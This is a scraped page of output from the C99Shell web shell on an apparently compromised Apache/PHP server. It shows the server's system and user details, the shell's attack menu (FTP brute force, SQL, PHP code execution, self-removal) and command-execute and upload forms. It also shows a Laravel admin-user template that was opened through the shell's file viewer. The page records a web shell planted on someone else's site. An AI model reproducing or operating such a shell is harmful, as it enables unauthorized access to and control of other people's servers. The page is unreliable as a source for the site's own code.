!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/resources/views/admin/admin/   drwxr-xr-x
Free 13.11 GB of 57.97 GB (22.61%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     index.blade.php (3.55 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
@extends('layouts.app')
@section('head')
@include('layouts.partials.headersection',['title'=>'admin'])
@endsection
@section('content')
<div class="card"  >
    <div class="card-body">
        <div class="row mb-30">
            <div class="col-lg-6">
                <h4>{{ __('Admins') }}</h4>
            </div>
            <div class="col-lg-6">
                
            </div>
        </div>
        <br>
        <div class="card-action-filter">
            <form method="post" class="basicform_with_reload" action="{{ route('admin.users.destroy') }}">
                @csrf
                <div class="row">
                    <div class="col-lg-6">
                        <div class="d-flex">
                            <div class="single-filter">
                                <div class="form-group">
                                    <select class="form-control selectric" name="status">
                                        <option disabled selected>{{ __('Select Action') }}</option>
                                        <option value="1">{{ __('Active') }}</option>
                                        <option value="0">{{ __('Deactivate') }}</option>
                                        
                                    </select>
                                </div>
                            </div>
                            @can('admin.edit')
                            <div class="single-filter">
                                <button type="submit" class="btn btn-primary btn-lg ml-2 basicbtn">{{ __('Apply') }}</button>
                            </div>
                            @endcan
                        </div>
                    </div>
                    <div class="col-lg-6">
                        @can('admin.create')
                        <div class="add-new-btn">
                            <a href="{{ route('admin.users.create') }}" class="btn btn-primary float-right">{{ __('Add New Admin') }}</a>
                        </div>
                        @endcan
                    </div>
                </div>
            </div>
            <div class="table-responsive custom-table">
                <table class="table">
                    <thead>
                        <tr>
                            <th>
                                <div class="custom-control custom-checkbox">
                                    <input type="checkbox" class="custom-control-input checkAll" id="customCheck12">
                                    <label class="custom-control-label checkAll" for="customCheck12"></label>
                                </div>
                            </th>
                            <th>{{ __('Name') }}</th>
                            <th>{{ __('Email') }}</th>
                            <th>{{ __('Status') }}</th>
                            <th>{{ __('Role') }}</th>
                        </tr>
                    </thead>
                    <tbody>
                        @foreach($users as $row)
                        <tr>
                            <td>
                                <div class="custom-control custom-checkbox">
                                    <input type="checkbox" name="ids[]" class="custom-control-input" id="customCheck{{ $row->id }}" value="{{ $row->id }}">
                                    <label class="custom-control-label" for="customCheck{{ $row->id }}"></label>
                                </div>
                            </td>
                            <td>
                                {{ $row->name }}
                                @can('admin.edit')
                                <div class="hover">
                                    <a href="{{ route('admin.users.edit',$row->id) }}">{{ __('Edit') }}</a>

                                    
                                </div>
                                @endcan
                            </td>
                            <td>
                               {{ $row->email }}
                               
                            </td>
                        <td>@if($row->status==1)
                            <span class="badge badge-success">{{ __('Active') }}</span>
                            @else
                            <span class="badge badge-danger">{{ __('Deactive') }}</span>

                        @endif</td>
                        <td>@foreach($row->roles as $r) <span class="badge badge-primary">{{ $r->name }}</span> @endforeach</td>
                            
                        </tr>
                        @endforeach
                    </tbody>
                </form>
            
            </table>
            

        </div>
    </div>
</div>
@endsection
@section('script')
<script src="{{ asset('admin/js/form.js') }}"></script>
@endsection

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--